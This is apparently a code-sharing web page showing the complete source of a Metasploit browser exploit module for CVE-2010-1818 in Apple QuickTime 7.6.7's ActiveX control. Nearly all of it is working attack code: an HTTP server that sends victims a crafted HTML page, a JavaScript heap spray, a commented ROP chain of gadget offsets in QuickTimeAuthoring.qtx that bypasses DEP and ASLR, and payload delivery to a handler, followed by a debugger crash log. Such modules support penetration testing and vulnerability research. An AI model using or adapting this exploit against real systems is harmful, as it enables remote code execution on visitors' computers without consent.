扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 |
## # $Id: apple_quicktime_marshaled_punk.rb 11513 2011-01-08 00:25:44Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Seh include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_name=> OperatingSystems::WINDOWS, :javascript => true, :rank => NormalRanking, # reliable memory corruption :vuln_test=> nil, }) def initialize(info = {}) super(update_info(info, 'Name' => 'Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution', 'Description'=> %q{ This module exploits a memory trust issue in Apple QuickTime 7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX control will treat a supplied parameter as a trusted pointer. It will then use it as a COM-type pUnknown and lead to arbitrary code execution. This exploit utilizes a combination of heap spraying and the QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions. NOTE: The addresses may need to be adjusted for older versions of QuickTime. }, 'Author' => [ 'Ruben Santemarta',# original discovery 'jduck'# Metasploit module ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 11513 $', 'References' => [ [ 'CVE', '2010-1818' ], [ 'OSVDB', '67705'], [ 'URL', 'http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload'=> { 'Space'=> 384, # perhaps more? 'BadChars' => "",# none... 'DisableNops' => true, 'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "mov esp,ebp").encode_string, # fix esp up }, 'Platform' => 'win', 'Targets'=> [ # Tested OK: # # QT 7.6.6 + XP SP3 + IE8 # QT 7.6.7 + XP SP3 + IE6 # # @eromange reports it doesn't work on 7.6.5 # - further investigation shows QuickTimeAuthoring.qtx changed / rop gadgets different # QuickTimeAuthoring.qtx 7.6.7 is compiled w/DYNAMIC_BASE, so win7 is :( [ 'Apple QuickTime Player 7.6.6 and 7.6.7 on Windows XP SP3', { 'Ret' => 0x677a0000, # base of QuickTimeAuthoring.qtx #'Ret' => 0x67780000, # base of QuickTimeAuthoring.qtx v7.6.5 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Aug 30 2010', 'DefaultTarget'=> 0)) end def on_request_uri(client, request) return if ((p = regenerate_payload(client)) == nil) print_status("Sending #{self.name} exploit HTML to #{client.peerhost}:#{client.peerport}...") shellcode = Rex::Text.to_unescape(p.encoded) # We will spray to this address, hopefully spray_target = 0x15220c20 # This is where our happy little dll is loaded # 677a0000 679ce000 QuickTimeAuthoring C:\Program Files\QuickTime\QTSystem\QuickTimeAuthoring.qtx rop_mod_base = target.ret sploit = [ spray_target - 8, # This first piece of code points the stack pointer to our data! # NOTE: eax, ecx, and esi all point to our spray at this point. rop_mod_base + 0x79c12, # xchg eax,esp / pop edi / pop esi / ret # The second one becomes the new program counter after stack flip. rop_mod_base + 0x1e27, # pop ecx / ret rop_mod_base + 0x170088,# the IAT addr for HeapCreate (becomes ecx) # We get the address of HeapCreate from the IAT here. rop_mod_base + 0x10244, # mov eax,[ecx] / ret # Call HeapCreate to create the k-rad segment rop_mod_base + 0x509e, # call eax 0x01040110, # flOptions (gets & with 0x40005) 0x01010101, # dwInitialSize 0x01010101, # dwMaximumSize # Don't bother calling HeapAlloc, just add 0x8000 to the Heap Base # Set ebx to our adjustment rop_mod_base + 0x307a, # pop ebx / ret 0x8000, # becomes ebx # Adjust eax rop_mod_base + 0xbfb5b, # add eax,ebx / ret # Save our buffer pointer off to this address rop_mod_base + 0x1e27, # pop ecx / ret rop_mod_base + 0x2062d4,# something writable # Write eax to the address rop_mod_base + 0x8fd6, # mov [ecx], eax / ret # Now we must copy our real payload into the buffer # First, setup edi rop_mod_base + 0x134fd5, # xchg eax,edi / ret # Get ESI from EDI (which is now in EAX) rop_mod_base + 0x103ff8, # push eax / pop esi / pop ebx / ret 0x41414141, # scratch (becomes ebx) # Set ECX from the stack rop_mod_base + 0x1e27, # pop ecx / ret 0x200 / 4, # dwords to copy :) # copy it! rop_mod_base + 0x778d2, # rep movsd / pop edi / pop esi / ret 0x41414141, # scratch (becomes edi) 0x41414141, # scratch (becomes esi) # Re-load the buffer pointer address rop_mod_base + 0x1e27, # pop ecx / ret rop_mod_base + 0x2062d4,# something writable # And the pointer value itself rop_mod_base + 0x10244, # mov eax,[ecx] / ret # Set ebx to our adjustment rop_mod_base + 0x307a, # pop ebx / ret 0x42424242, # will be filled after array init # Adjust eax rop_mod_base + 0xbfb5b, # add eax,ebx / ret # Jump! rop_mod_base + 0x509e,# call eax # eh? Hopefull we didn't reach here. 0xdeadbeef ] sploit[27] = 8 + (sploit.length * 4) sploit = sploit.pack('V*') sploit << p.encoded sploit = Rex::Text.to_unescape(sploit) custom_js = <<-EOF function Prepare() { var block = unescape("#{sploit}"); while(block.length < 0x200) block += unescape("%u0000"); heap = new heapLib.ie(0x20000); while(block.length < 0x80000) block += block; finalspray = block.substring(2, 0x80000 - 0x21); for(var i = 0; i < 350; i++) { heap.alloc(finalspray); } } function start() { var obj = '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"'+'>' + '</'+ 'object>'; document.getElementById('stb').innerHTML = obj; Prepare(); var targ = #{spray_target}; var obj = '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"' + '>' + '<' + 'PARAM name="_Marshaled_pUnk" value="' + targ + '"' + '/>' + '</'+ 'object>'; document.getElementById('xpl').innerHTML = obj; } EOF hl_js = heaplib(custom_js) content = <<-EOF <html> <head> <script language="javascript"> #{hl_js} </script> </head> <body onload="start()"> <div id="stb"></div> <div id="xpl"></div> </body> </html> EOF # .. send_response(client, content, { 'Content-Type' => "text/html" }) # Handle the payload handler(client) end end =begin (7fc.a4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=15220c20 ebx=00134ca8 ecx=15220c18 edx=00134b98 esi=15220c20 edi=00134bfc eip=deadbe01 esp=00134b7c ebp=00134b90 iopl=0 nv up ei pl nz na po nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010202 deadbe01 ????? =end |
体验盒子
